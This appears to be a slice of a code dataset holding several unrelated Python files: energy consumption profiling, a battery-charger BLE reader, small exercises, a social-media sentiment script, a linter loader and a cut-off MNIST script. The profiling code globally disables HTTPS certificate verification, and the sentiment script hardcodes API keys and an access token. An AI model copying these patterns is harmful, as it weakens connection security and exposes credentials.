(date(XXXX-XX-XX), 110)]}\n        _measures = list(measures)\n        measures = {}\n        for m in sorted(_measures):\n            measures.setdefault(m.period.code, [])\n            measures[m.period.code].append(m)\n        measures_intervals = EnergyMeasure.intervals(_measures)\n        # Detect single day profiling case\n        if len(measures_intervals) == 1:\n            measures_intervals.append(measures_intervals[-1]) # duplicate measure date to do not skip loop below\n        logger.debug('Profiling {0} intervals'.format(len(measures_intervals)))\n        for idx, measure_date in enumerate(measures_intervals):\n            if idx + 1 == len(measures_intervals):\n                break\n            start = measure_date\n            if idx > 0:\n                start += timedelta(days=1)\n            end = measures_intervals[idx + 1]\n            logger.debug('Getting coeffs from {0} to {1}'.format(\n                start, end\n            ))\n            sum_cofs = self.coefficient.get_coefs_by_tariff(tariff, start, end)\n            dragger = Dragger()\n            for hour, cof in self.coefficient.get_range(start, end):\n                dt = hour - timedelta(minutes=1)\n                period = tariff.get_period_by_date(dt)\n                if drag_method == 'hour':\n                    dp = 'hour'\n                else:\n                    dp = period.code\n                d = hour.date()\n                if hour.hour == 0:\n                    d -= timedelta(days=1)\n                # To take the first measure\n                if d == start and len(set(measures_intervals)) != 1: # if single day case, do not regress date\n                    d += timedelta(days=1)\n                fake_m = Measure(d, period, 0)\n                pos = bisect.bisect_left(measures.get(period.code, []), fake_m)\n                pcode = period.code\n                if pcode not in measures or pos >= len(measures[period.code]):\n                    consumption = 0\n                    consumption_date = None\n                else:\n                    consumption = measures[period.code][pos].consumption\n                    consumption_date = measures[period.code][pos].date\n                logger.debug('Hour: {0} Period: {1} Consumption: {2}'.format(\n                    hour, period.code, consumption\n                ))\n                cof = cof[tariff.cof]\n                hour_c = ((consumption * cof) / sum_cofs[period.code])\n                aprox = dragger.drag(hour_c, key=dp)\n                yield (\n                    hour,\n                    {\n                        'aprox': aprox,\n                        'drag': dragger[dp],\n                        'consumption': consumption,\n                        'consumption_date': consumption_date,\n                        'sum_cofs': sum_cofs[period.code],\n                        'cof': cof,\n                        'period': period.code\n                    }\n                )\n\n\nclass REEProfile(object):\n    HOST = 'www.ree.es'\n    PATH = '/sites/default/files/simel/perff'\n    GISCE_URL = 'https://github.com/gisce/ree_monthly_profiles/blob/main/perff/'\n    down_lock = Lock()\n\n    _CACHE = {}\n\n    @classmethod\n    def get_range(cls, start, end):\n        cofs = []\n        start = datetime(start.year, start.month, 1)\n        end = datetime(end.year, end.month, 1)\n        while start <= 
end:\n logger.debug('Downloading coefficients for {0}/{1}'.format(\n start.month, start.year\n ))\n cofs.extend(REEProfile.get(start.year, start.month))\n start += relativedelta(months=1)\n return cofs\n\n @classmethod\n def get(cls, year, month):\n try:\n import ssl\n try:\n _create_unverified_https_context = ssl._create_unverified_context\n except AttributeError:\n pass\n else:\n ssl._create_default_https_context = _create_unverified_https_context\n except ImportError:\n pass\n conn = None\n try:\n cls.down_lock.acquire()\n\n key = '%(year)s%(month)02i' % locals()\n if key in cls._CACHE:\n logger.debug('Using CACHE for REEProfile {0}'.format(key))\n return cls._CACHE[key]\n perff_file = 'PERFF_%(key)s.gz' % locals()\n conn = httplib.HTTPSConnection(cls.HOST)\n conn.request('GET', '%s/%s' % (cls.PATH, perff_file))\n logger.debug('Downloading REEProfile from {0}/{1}'.format(\n cls.PATH, perff_file\n ))\n r = conn.getresponse()\n if r.getheader('Content-Type') == 'application/x-gzip':\n content = r.read()\n try:\n c = StringIO(content)\n m = StringIO(gzip.GzipFile(fileobj=c).read())\n except:\n c = BytesIO(content)\n n = BytesIO(gzip.GzipFile(fileobj=c).read())\n content = n.read().decode('iso8859-15')\n m = StringIO(content)\n c.close()\n reader = csv.reader(m, delimiter=';')\n header = True\n cofs = []\n coeffs_list = get_tariff_coeffs_list(year, month)\n for vals in reader:\n if header:\n header = False\n continue\n if int(vals[3]) == 1:\n n_hour = 1\n dt = datetime(\n int(vals[0]), int(vals[1]), int(vals[2])\n )\n day = TIMEZONE.localize(dt, is_dst=bool(not int(vals[4])))\n day += timedelta(hours=n_hour)\n n_hour += 1\n cofs.append(Coefficent(\n TIMEZONE.normalize(day), dict(\n (k, float(vals[i])) for i, k in enumerate(coeffs_list, 5)\n ))\n )\n cls._CACHE[key] = cofs\n return cofs\n else:\n try:\n perff_file = 'PERFF_%(key)s.0.bz2' % locals()\n r = requests.get(cls.GISCE_URL + perff_file, params={'raw': 'true'})\n c = StringIO(r.content)\n m = StringIO(bz2.decompress(c.read()))\n reader = csv.reader(m, delimiter=';')\n header = True\n cofs = []\n coeffs_list = get_tariff_coeffs_list(year, month)\n for vals in reader:\n if header:\n header = False\n continue\n if int(vals[3]) == 1:\n n_hour = 1\n dt = datetime(\n int(vals[0]), int(vals[1]), int(vals[2])\n )\n day = TIMEZONE.localize(dt, is_dst=bool(not int(vals[4])))\n day += timedelta(hours=n_hour)\n n_hour += 1\n cofs.append(Coefficent(\n TIMEZONE.normalize(day), dict(\n (k, float(vals[i])) for i, k in enumerate(coeffs_list, 5)\n ))\n )\n cls._CACHE[key] = cofs\n return cofs\n except:\n raise Exception('Profiles from REE not found')\n finally:\n if conn is not None:\n conn.close()\n cls.down_lock.release()\n\n\nclass REProfile(object):\n translate_month = {\n 1: 'Enero',\n 2: 'Febrero',\n 3: 'Marzo',\n 4: 'Abril',\n 5: 'Mayo',\n 6: 'Junio',\n 7: 'Julio',\n 8: 'Agosto',\n 9: 'Septiembre',\n 10: 'Octubre',\n 11: 'Noviembre',\n 12: 'Diciembre'\n }\n\n @classmethod\n def get_range(cls, start, end):\n sheet_name = 'zona_{}'.format(cls.climatic_zone)\n filename = path.join(\n path.dirname(path.realpath(__file__)), 'data/coefficients_RE.xlsx'\n )\n df = pd.read_excel(filename, sheet_name=sheet_name)\n key = df.keys()[0]\n cofs = []\n while start <= end:\n month = cls.translate_month[start.month]\n solar_hour = convert_to_solar_hour(start)\n if solar_hour.hour != 0:\n hour = solar_hour.hour\n else:\n hour = 24\n coff_value = float(df[df[key] == month][hour])\n coff = Coefficent(start, {'A': coff_value})\n cofs.append(coff)\n start += 
relativedelta(hours=1)\n return cofs\n\n @classmethod\n def validate_exported_energy(cls, measures):\n \"\"\"\n Check if there are ProfileHour with energy != 0 in periods with RE coefficient == 0\n :param measures: A list ProfileHour objects\n :return valid: A boolean that indicates if all the profiles in measures are valid\n :return invalid_profiles: A list containing the invalid profiles in measures\n \"\"\"\n # Check if measures list is valid\n valid = True\n # Save invalid profiles\n invalid_profiles = []\n # get and iterate RE coefficients\n coefficients = cls.get_range(min(measures).date, max(measures).date)\n # iterate all RE measures\n for measure in measures:\n # if energy value is not zero\n if measure[1] != 0:\n # fetch coeff by profile date\n cof = False\n for c in coefficients:\n if c.hour == measure[0]:\n cof = c\n break\n if cof:\n # if coeff is zero\n if cof.cof['A'] == 0:\n # replace energy value by 'warning'\n invalid_profiles.append(measure)\n # mark measures as invalid\n valid = False\n return valid, invalid_profiles\n\n\nclass REProfileZone1(REProfile):\n climatic_zone = 1\n\n\nclass REProfileZone2(REProfile):\n climatic_zone = 2\n\n\nclass REProfileZone3(REProfile):\n climatic_zone = 3\n\n\nclass REProfileZone4(REProfile):\n climatic_zone = 4\n\n\nclass REProfileZone5(REProfile):\n climatic_zone = 5\n\n\nclass REProfileHydraulic(REProfile):\n @classmethod\n def get_range(cls, start, end):\n filename = path.join(path.dirname(path.realpath(__file__)), 'data/coefficients_HIDRO_RE.csv')\n df = pd.read_csv(filename)\n cofs = []\n while start <= end:\n month = cls.translate_month[start.month]\n coff_value = float(df[df['MES'] == month]['Factor de funcionamiento'])\n coff = Coefficent(start, {'A': coff_value})\n cofs.append(coff)\n start += relativedelta(hours=1)\n return cofs\n\n\nclass REProfileFlat(REProfile):\n flat_cof = 0.85\n @classmethod\n def get_range(cls, start, end):\n cofs = []\n while start <= end:\n cofs.append(Coefficent(start, {'A': cls.flat_cof}))\n start += relativedelta(hours=1)\n return cofs\n\n\nclass ProfileHour(namedtuple('ProfileHour', ['date', 'measure', 'valid', 'accumulated'])):\n\n __slots__ = ()\n\n def __lt__(self, other):\n return self.date < other.date\n\n def __le__(self, other):\n return self.date <= other.date\n\n def __gt__(self, other):\n return self.date > other.date\n\n def __ge__(self, other):\n return self.date >= other.date\n\n\nclass Profile(object):\n \"\"\"A Profile object representing hours and consumption.\n \"\"\"\n\n def __init__(self, start, end, measures, accumulated=None, drag_by_periods=True):\n self.measures = measures[:]\n self.gaps = [] # Containing the gaps and invalid measures\n self.adjusted_periods = [] # If a period is adjusted\n self.start_date = start\n self.end_date = end\n self.profile_class = REEProfile\n\n assert type(drag_by_periods) == bool, \"drag_by_periods must be a Boolean\"\n self.drag_by_periods = drag_by_periods\n\n self.accumulated = Decimal(0)\n if accumulated:\n assert type(accumulated) == float or isinstance(accumulated, Decimal), \"Provided accumulated must be a Decimal or a float\"\n assert accumulated < 1 and accumulated > -1, \"Provided accumulated '{}' must be -1 < accumulated < 1\".format(accumulated)\n self.accumulated = accumulated\n\n measures_by_date = dict(\n [(m.date, m.measure) for m in measures if m.valid]\n )\n # End is included\n while start <= end:\n if measures_by_date.pop(TIMEZONE.normalize(start), None) is None:\n self.gaps.append(start)\n start += timedelta(hours=1)\n\n 
@property\n def n_hours(self):\n # End date is included, we have to sum one hour\n return int((self.end_date - self.start_date).total_seconds() / 3600) + 1\n\n @property\n def n_hours_measures(self):\n return len(self.measures)\n\n @property\n def total_consumption(self):\n return sum(x[1] for x in self.measures)\n\n @property\n def first_day_of_month(self):\n return self.end_date.day == 1 and self.end_date.hour > 0\n\n @staticmethod\n def simple_dragger(measures):\n dragger = Dragger()\n for idx, measure in enumerate(measures):\n values = measure._asdict()\n consumption = dragger.drag(measure.measure)\n values['measure'] = consumption\n measures[idx] = measure._replace(**values)\n return measures\n\n def get_hours_per_period(self, tariff, only_valid=False):\n assert isinstance(tariff, Tariff)\n hours_per_period = Counter()\n if only_valid:\n for m in self.measures:\n if m.valid:\n dt = m.date - timedelta(minutes=1)\n period = tariff.get_period_by_date(dt)\n hours_per_period[period.code] += 1\n else:\n start_idx = self.start_date\n end = self.end_date\n while start_idx <= end:\n dt = start_idx - timedelta(minutes=1)\n period = tariff.get_period_by_date(dt)\n hours_per_period[period.code] += 1\n start_idx += timedelta(hours=1)\n return hours_per_period\n\n def get_consumption_per_period(self, tariff):\n assert isinstance(tariff, Tariff)\n consumption_per_period = Counter()\n for period in tariff.energy_periods:\n consumption_per_period[period] = 0\n for m in self.measures:\n if m.valid:\n dt = m.date - timedelta(minutes=1)\n period = tariff.get_period_by_date(dt)\n consumption_per_period[period.code] += m.measure\n return consumption_per_period\n\n def get_estimable_hours(self, tariff):\n assert isinstance(tariff, Tariff)\n total_hours = self.get_hours_per_period(tariff)\n valid_hours = self.get_hours_per_period(tariff, only_valid=True)\n estimable_hours = {}\n for period in total_hours.keys():\n estimable_hours[period] = total_hours[period] - valid_hours[period]\n return estimable_hours\n\n def get_estimable_consumption(self, tariff, balance):\n assert isinstance(tariff, Tariff)\n consumption_per_period = self.get_consumption_per_period(tariff)\n estimable = {}\n for period in consumption_per_period:\n estimable[period] = balance[period] - consumption_per_period[period]\n return estimable\n\n def estimate(self, tariff, balance):\n assert isinstance(tariff, Tariff)\n logger.debug('Estimating for tariff: {0}'.format(\n tariff.code\n ))\n\n # Adapt balance for simplified T30A with just one period\n if isinstance(tariff, T30A_one_period) or isinstance(tariff, T31A_one_period):\n balance = {\n \"P1\": sum([values for values in balance.values()])\n }\n # Adapt T31A6P adding P4 to P1\n if isinstance(tariff, T31A) and balance.get('P4', 0) > 0:\n balance['P1'] += balance['P4']\n balance['P4'] = 0\n\n measures = [x for x in self.measures if x.valid]\n start = self.start_date\n end = self.end_date\n # - REE cofs get from (year/month)\n # - Simel cofs get from (year/month/day hour) - can't substract one day\n if self.first_day_of_month or not issubclass(self.profile_class,\n REEProfile):\n cofs = self.profile_class.get_range(start, end)\n else:\n cofs = self.profile_class.get_range(\n start, end - relativedelta(days=1)\n )\n cofs = Coefficients(cofs)\n cofs_per_period = Counter()\n\n for gap in self.gaps:\n dt = gap - timedelta(minutes=1)\n period = tariff.get_period_by_date(dt)\n gap_cof = cofs.get(dt)\n cofs_per_period[period.code] += gap_cof.cof[tariff.cof]\n\n logger.debug('Coefficients per period 
calculated: {0}'.format(\n            cofs_per_period\n        ))\n\n        energy_per_period = self.get_estimable_consumption(tariff, balance)\n        energy_per_period_rem = energy_per_period.copy()\n\n        dragger = Dragger()\n\n        # Initialize the Dragger with the passed accumulated value\n        if len(self.gaps) > 0:\n            # Drag by hours\n            if not self.drag_by_periods:\n                init_drag_key = \"default\"\n            else:\n                dt = self.gaps[0] - timedelta(minutes=1)\n                init_drag_key = tariff.get_period_by_date(dt).code\n\n            dragger.drag(self.accumulated, key=init_drag_key)\n\n        for idx, gap in enumerate(self.gaps):\n            logger.debug('Gap {0}/{1}'.format(\n                idx + 1, len(self.gaps)\n            ))\n            dt = gap - timedelta(minutes=1)\n            period = tariff.get_period_by_date(dt)\n\n            drag_key = period.code if self.drag_by_periods else \"default\"\n\n            gap_cof = cofs.get(gap).cof[tariff.cof]\n            energy = energy_per_period[period.code]\n            # If balance[period] < energy_profile[period], fill with 0\n            if energy < 0:\n                energy = 0\n\n            try:\n                gap_energy = (energy * gap_cof) / cofs_per_period[period.code]\n            except ZeroDivisionError as error:\n                gap_energy = 0\n                logger.debug(error)\n\n            aprox = dragger.drag(gap_energy, key=drag_key)\n            energy_per_period_rem[period.code] -= gap_energy\n\n            logger.debug(\n                'Energy for hour {0} is {1}. {2} Energy {3}/{4}'.format(\n                    gap, aprox, period.code,\n                    energy_per_period_rem[period.code], energy\n                ))\n            pos = bisect.bisect_left(measures, ProfileHour(gap, 0, True, 0.0))\n            profile_hour = ProfileHour(TIMEZONE.normalize(gap), aprox, True, dragger[drag_key])\n\n            measures.insert(pos, profile_hour)\n\n        profile = Profile(self.start_date, self.end_date, measures)\n        return profile\n\n    def adjust(self, tariff, balance, diff=0):\n        # Adjust values\n        if self.gaps:\n            raise Exception('It is not possible to adjust a profile with gaps')\n        profile = Profile(self.start_date, self.end_date, self.measures)\n        dragger = Dragger()\n        energy_per_period = profile.get_consumption_per_period(tariff)\n        for period_name, period_balance in balance.items():\n            period_profile = energy_per_period[period_name]\n            margin_bottom = period_balance - diff\n            margin_top = period_balance + diff\n            if not margin_bottom <= period_profile <= margin_top:\n                profile.adjusted_periods.append(period_name)\n                for idx, measure in enumerate(profile.measures):\n                    dt = measure.date - timedelta(minutes=1)\n                    period = tariff.get_period_by_date(dt).code\n                    if period != period_name:\n                        continue\n                    values = measure._asdict()\n                    values['valid'] = True\n                    if not energy_per_period[period]:\n                        values['measure'] = dragger.drag(measure.measure * 0)\n                    else:\n                        values['measure'] = dragger.drag(measure.measure * (\n                            balance[period] / energy_per_period[period]\n                        ))\n                    profile.measures[idx] = measure._replace(**values)\n        return profile\n\n    def fixit(self, tariff, balance, diff=0):\n        # Fill the gaps\n        profile = self.estimate(tariff, balance)\n        # Adjust to the balance\n        profile = profile.adjust(tariff, balance, diff)\n\n        if hasattr(tariff, 'low_voltage_measure') and getattr(tariff, 'low_voltage_measure'):\n            # Apply losses on new 6.XTD flag_low and old 3.1A LB\n            profile.measures = tariff.apply_curve_losses(profile.measures)\n            profile.measures = self.simple_dragger(profile.measures)\n        return profile\n\n    def __repr__(self):\n        return '<Profile ({0} - {1}) {2}h {3}kWh>'.format(\n            self.start_date, self.end_date, self.n_hours, self.total_consumption\n        
)\n","repo_name":"gisce/enerdata","sub_path":"enerdata/profiles/profile.py","file_name":"profile.py","file_ext":"py","file_size_in_byte":26297,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"61"} +{"seq_id":"8699760184","text":"import asyncio\nimport sys\nfrom time import time\n\nfrom bleak import BleakClient\nimport pendulum\n\n\nclass MC3000Ble:\n \"\"\"\n SkyRC MC3000 charger BLE implementation (Bluetooth Low Energy).\n\n This code implements only reading status of slots.\n All decoding logic was extracted from Android SkyRC MC3000 apk.\n\n Specifically `com.skyrc.mc3000.thread.BleThread` together with `com.skyrc.mc3000.broadcast.actions.Config`\n contain also other functions like get/set parameters, start/stop control, ... I didn't implement those\n since I'm interested only in slots readout to monitor progress. Android code is quite readable,\n nearly all logic is contained in classes.dex and jadx-gui does good job on decompiling.\n \"\"\"\n\n SERVICE_UUID = \"0000ffe0-0000-1000-8000-00805f9b34fb\"\n CHARACTERISTIC_UUID = \"0000ffe1-0000-1000-8000-00805f9b34fb\"\n\n BATTERY_INFO = 85\n\n types = {0: \"LiIon\", 1: \"LiFe\", 2: \"LiIo4_35\", 3: \"NiMH\", 4: \"NiCd\", 5: \"NiZn\", 6: \"Eneloop\", 7: \"Ram\", 8: \"Batlto\"}\n modes = {\n 0: {0: \"charge\", 1: \"refresh\", 2: \"storage\", 3: \"discharge\", 4: \"cycle\"},\n 1: {0: \"charge\", 1: \"refresh\", 2: \"discharge\", 3: \"cycle\"},\n 2: {0: \"charge\", 1: \"refresh\", 2: \"break in\", 3: \"discharge\", 4: \"cycle\"},\n }\n modes_types_mapping = {\n # mode_index: [type_index, type_index, ...]\n 0: [0, 1, 2, 8],\n 1: [5, 7],\n 2: [3, 4, 6],\n }\n statuses = {\n 0: \"standby\",\n 1: \"charge\",\n 2: \"discharge\",\n 3: \"pause\",\n 4: \"completed\",\n 128: \"input low voltage\",\n 129: \"input high voltage\",\n 130: \"ADC MCP3424-1 error\",\n 131: \"ADC MCP3424-2 error\",\n 132: \"connection brake\",\n 133: \"check voltage\",\n 134: \"capacity limit reached\",\n 135: \"time limit reached\",\n 136: \"system over temperature\",\n 137: \"battery over temperature\",\n 138: \"short circuit\",\n 139: \"wrong polarity\",\n }\n\n def __init__(self, ble_address, interval=1):\n self.ble_address = ble_address\n self.interval = interval\n self.running = False\n self.receive_callback = None\n\n def run(self, receive_callback):\n self.running = True\n self.receive_callback = receive_callback\n asyncio.run(self._loop_async())\n\n def stop(self):\n self.running = False\n\n async def _loop_async(self):\n interval = float(self.interval)\n begin = time()\n async with BleakClient(self.ble_address) as client:\n await client.start_notify(self.CHARACTERISTIC_UUID, self._async_callback)\n\n while self.running:\n await client.write_gatt_char(self.CHARACTERISTIC_UUID, self.get_channel_request_data(0))\n await asyncio.sleep(0.100)\n await client.write_gatt_char(self.CHARACTERISTIC_UUID, self.get_channel_request_data(1))\n await asyncio.sleep(0.100)\n await client.write_gatt_char(self.CHARACTERISTIC_UUID, self.get_channel_request_data(2))\n await asyncio.sleep(0.100)\n await client.write_gatt_char(self.CHARACTERISTIC_UUID, self.get_channel_request_data(3))\n await asyncio.sleep(interval - ((time() - begin) % interval))\n\n await client.stop_notify(self.CHARACTERISTIC_UUID)\n\n async def _async_callback(self, sender, data):\n if data[1] == self.BATTERY_INFO:\n battery_info = self.parse_battery_info(data)\n if self.receive_callback:\n callback = self.receive_callback\n callback(battery_info)\n\n def 
parse_battery_info(self, data):\n        battery_info = {\n            \"slot\": data[2],\n        }\n\n        type = data[3] & 255\n        battery_info[\"type\"] = self.types[type] if type in self.types else \"unknown\"\n\n        available_modes = None\n        for mode_group, applicable_types in self.modes_types_mapping.items():\n            if type in applicable_types:\n                available_modes = self.modes[mode_group]\n                break\n\n        mode = data[4] & 255\n        battery_info[\"mode\"] = available_modes[mode] if available_modes and mode in available_modes else \"unknown\"\n        battery_info[\"count\"] = data[5] & 255\n\n        status = data[6] & 255\n        battery_info[\"status\"] = self.statuses[status] if status in self.statuses else \"unknown error\"\n\n        seconds = ((data[7] & 255) * 256) + (data[8] & 255)\n        battery_info[\"time\"] = pendulum.duration(seconds=seconds)\n\n        battery_info[\"voltage\"] = (((data[9] & 255) * 256) + (data[10] & 255)) / 1000\n        battery_info[\"current\"] = (((data[11] & 255) * 256) + (data[12] & 255)) / 1000\n        battery_info[\"capacity\"] = (((data[13] & 255) * 256) + (data[14] & 255))\n        battery_info[\"temperature\"] = data[15] & 255\n\n        resistance = ((data[16] & 255) * 256) + (data[17] & 255)\n        battery_info[\"resistance\"] = \"n/a\" if resistance in [0, 1, 65535] else resistance\n\n        led = data[18] & 255\n        battery_info[\"led\"] = self.resolve_led_color(led, battery_info[\"slot\"])\n        return battery_info\n\n    def resolve_led_color(self, value, slot_index):\n        def get_bit_value(bit):\n            return (value >> bit) & 1\n\n        if get_bit_value(slot_index):\n            return \"red\"\n        if get_bit_value(slot_index + 4):\n            return \"green\"\n        return \"none\"\n\n    def get_channel_request_data(self, channel_index):\n        payload = [15, self.BATTERY_INFO, channel_index, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]\n        self.fill_checksum(payload)\n        return bytearray(payload)\n\n    def fill_checksum(self, payload):\n        sum = 0\n        for byte in payload:\n            sum += byte\n        payload[-1] = sum & 255\n\n\nclass DebugPrint:\n    buffer = {}\n\n    def __init__(self, ble_address):\n        self.service = MC3000Ble(ble_address=ble_address, interval=3)\n\n    def run(self):\n        self.service.run(self.receive_callback)\n\n    def receive_callback(self, battery_info):\n        slot = battery_info[\"slot\"]\n        self.buffer[slot] = battery_info\n        if slot == 3 and len(self.buffer) == 4:\n            for battery_info in self.buffer.values():\n                print(battery_info)\n            print()\n\n\nif __name__ == \"__main__\":\n    try:\n        DebugPrint(ble_address=sys.argv[1]).run()\n    except KeyboardInterrupt:\n        exit(1)\n","repo_name":"kolinger/skyrc-mc3000","sub_path":"mc3000ble.py","file_name":"mc3000ble.py","file_ext":"py","file_size_in_byte":6362,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"61"}
+{"seq_id":"14801347366","text":"#PF-Assgn-56\n\ndef max_frequency_word_counter(data):\n    word=\"\"\n    frequency=0\n    new1={}\n    word_list=[]\n    new_text=data.upper().split()\n    \n    for i in new_text:\n        count=new_text.count(i)\n        new1[i]=count\n    \n    \n    value=list(new1.values())\n    value.sort(reverse=True)\n    key=list(new1.keys())\n    \n    frequency=value[0]\n    for i in new1:\n        if new1[i]==frequency:\n            word_list.append(i)\n    word=word_list[0]\n    for i in range(1,len(word_list)):\n        if len(word_list[i])>len(word):\n            word=word_list[i]\n    print(word,frequency)\n    \n#Provide different values for data and test your program.\ndata=\"Listen to the big clock Tick tock tick\" \nmax_frequency_word_counter(data)","repo_name":"Shweta2013/InfyTQ-Exercises-And-Assignments","sub_path":"PROGRAMMING FUNDAMENTALS USING PYTHON/Day 
8/#PF-Assgn-56.py","file_name":"#PF-Assgn-56.py","file_ext":"py","file_size_in_byte":726,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5732413173","text":"import numpy as np\nimport scipy as sp\nimport matplotlib as plt\nimport json\nimport requests\nimport facebook\nimport indicoio\nimport pickle\n\nfrom sklearn.cross_validation import train_test_split\nfrom sklearn.linear_model import LogisticRegression\n\nindicoio.config.api_key = \"bca760a95d156cbbad4729cb9cd4cb0e\"\nmy_access_token = \"EAACEdEose0cBAIcqBq4yCC1WZCEKiNGnzH4dZAv8PDKJS6kMH5VctNTGT2wwqMQZBmwmGlak03aZATBHcNwZBCX8KqH0CX6J11ZCCKocomKfFpezjX9ifj3lB0i8aeZApjMnHlEIkiIWdPiyV2TlKbw2rr33U6SibOKoPWiksawmgZDZD\"\n\nusers = [\"ladygaga\", \"leonardodicaprio\"]\nclf = [LogisticRegression(), LogisticRegression(), LogisticRegression()]\nfor i in range(0, len(clf)):\n graph = facebook.GraphAPI(access_token=my_access_token, version='2.6')\n posts = graph.get_object(\"/\" + users[i] + \"/\" + 'posts', limit=100)\n factorization_matrix = np.zeros(shape=[111, len(posts[\"data\"])])\n matrix_classes = np.zeros(shape=[1, len(posts[\"data\"])])\n for j in range(0, len(posts[\"data\"])):\n if 'message' in posts[\"data\"][j]:\n item = posts[\"data\"][j]\n payload = {'texts': [item[\"message\"]]}\n response = requests.post(\"https://api.uclassify.com/v1/uClassify/Sentiment/classify\",\n data=json.dumps(payload), headers={'Authorization': 'Token JbHwzZBLH1ke'})\n prediction = response.json()[0]\n text_tags = indicoio.text_tags(item[\"message\"], version=2)\n predicted_class = 0\n if prediction[\"classification\"][0][\"p\"] > prediction[\"classification\"][1][\"p\"]:\n predicted_class = 0\n else:\n predicted_class = 1\n\n matrix_classes[:, j] = predicted_class\n factorization_matrix[:, j] = list(text_tags.values())\n\n X_train, X_test, y_train, y_test = train_test_split(factorization_matrix.T, matrix_classes.T, test_size=0.2)\n clf[i].fit_transform(X_train, y_train)\n y_predict = clf[i].predict(X_test)\n print(\"Y_test shape = \", y_test.shape)\n print(\"Y_preidct shape = \", y_predict.shape)\n\n true_positives = 0\n for k in range(0, len(y_test)):\n if y_test[k] == y_predict[k]:\n true_positives += 1\n\n print(\"Accuracy = \", true_positives / y_test.shape[0])\n\n with open(\"classifier\" + str(i) + \".pickle\", \"wb\") as output_file:\n pickle.dump(clf[i], output_file)\n\n","repo_name":"nikola-miljkovic/citizen-reporter","sub_path":"Predictions/preference_prediction.py","file_name":"preference_prediction.py","file_ext":"py","file_size_in_byte":2347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"42876651408","text":"\"\"\" test modules \"\"\"\n\nimport sys\nfrom types import ModuleType\nfrom typing import Any, Dict, List, Optional\n\nfrom loguru import logger\n\n\nfrom . 
import (\n codeowners, # noqa: F401\n dependabot, # noqa: F401\n docs, # noqa: F401\n generic, # noqa: F401\n github_actions, # noqa: F401\n homebrew, # noqa: F401\n issues, # noqa: F401\n mkdocs, # noqa: F401\n # pylintrc,\n pyproject, # noqa: F401\n security_md, # noqa: F401\n terraform, # noqa: F401\n)\n\nCATEGORY = \"tests\"\nLANGUAGES = [\"all\"]\nDEFAULT_CONFIG: Dict[str, Any] = {}\n\n\ndef load_modules(module_allowlist: Optional[List[str]] = None) -> Dict[str, ModuleType]:\n \"\"\"loads the modules\"\"\"\n module_list: Dict[str, Any] = {}\n\n for module in sys.modules:\n if module.startswith(__name__) and len(module.split(\".\")) == 3:\n # skip them if we're filtering by module\n if module_allowlist and module not in module_allowlist:\n continue\n\n if hasattr(sys.modules[module], \"CATEGORY\") and module.startswith(__name__):\n # logger.debug(\"Adding module: {}\", module)\n module_name = module.replace(f\"{__name__}.\", \"\")\n module_list[module_name] = sys.modules[module]\n else:\n logger.warning(\"Module {} doesn't have a CATEGORY attribute.\", module)\n\n if not hasattr(sys.modules[module], \"DEFAULT_CONFIG\"):\n logger.warning(\n \"Module {} doesn't have a DEFAULT_CONFIG attribute, weirdness may occur.\",\n module,\n )\n if not hasattr(sys.modules[module], \"LANGUAGES\"):\n logger.warning(\n \"Module {} doesn't have a LANGUAGES attribute, weirdness may occur.\",\n module,\n )\n return module_list\n\n\nMODULES = load_modules()\n","repo_name":"yaleman/github_linter","sub_path":"github_linter/tests/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1870,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"23450996631","text":"from sys import argv\n\n# T = 4\n\n# shy = [\"4 11111\",\n# \"1 09\",\n# \"5 110011\",\n# \"0 1\"]\n\nifile = open(argv[1], \"rU\")\nofile = open(argv[2], \"w\")\n\nT = int(ifile.readline())\n\nfor case in xrange(1, T+1):\n\n # max_shy, aud = shy[case-1].split()\n\n max_shy, aud = ifile.readline().split()\n max_shy = int(max_shy)\n aud = [int(c) for c in aud]\n\n count = 0\n invite = 0\n for a in xrange(len(aud)):\n if count + invite < a and aud[a] > 0:\n invite += a - (count + invite)\n count += aud[a]\n\n if case < 5:\n print(\"Case #{}: {} for {}\".format(case, invite, aud))\n ofile.write(\"Case #{}: {}\\n\".format(case, invite))\n\nofile.close()\nifile.close()\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_155/2086.py","file_name":"2086.py","file_ext":"py","file_size_in_byte":702,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"11840313660","text":"import numpy as np\r\nimport pandas as pd\r\nimport keras\r\nfrom keras.utils import np_utils\r\nfrom keras.models import Sequential\r\nfrom keras.layers import Dense,Dropout,Flatten,Conv2D,MaxPooling2D\r\nimport cv2\r\nimport os\r\n\r\n\r\n\r\n(x_Train,y_Train),(x_Test,y_Test)=keras.datasets.mnist.load_data()\r\n# X=sample Y=label\r\nprint('x_Train_img',x_Train.shape)\r\nprint('y_Train_img',y_Train.shape)\r\n\r\nprint('x_Test_img',x_Test.shape)\r\nprint('y_Test_img',y_Test.shape)\r\n\r\n# 將RGB3維轉成一維\r\nprint(x_Train.shape)\r\nx_Train4D=x_Train.reshape(x_Train.shape[0],28,28,1).astype('float32')\r\nx_Test4D=x_Test.reshape(x_Test.shape[0],28,28,1).astype('float32')\r\nprint('x_Train4D.shape ',x_Train4D.shape)\r\nprint('x_Test4D.shape ',x_Test4D.shape)\r\n\r\n# 
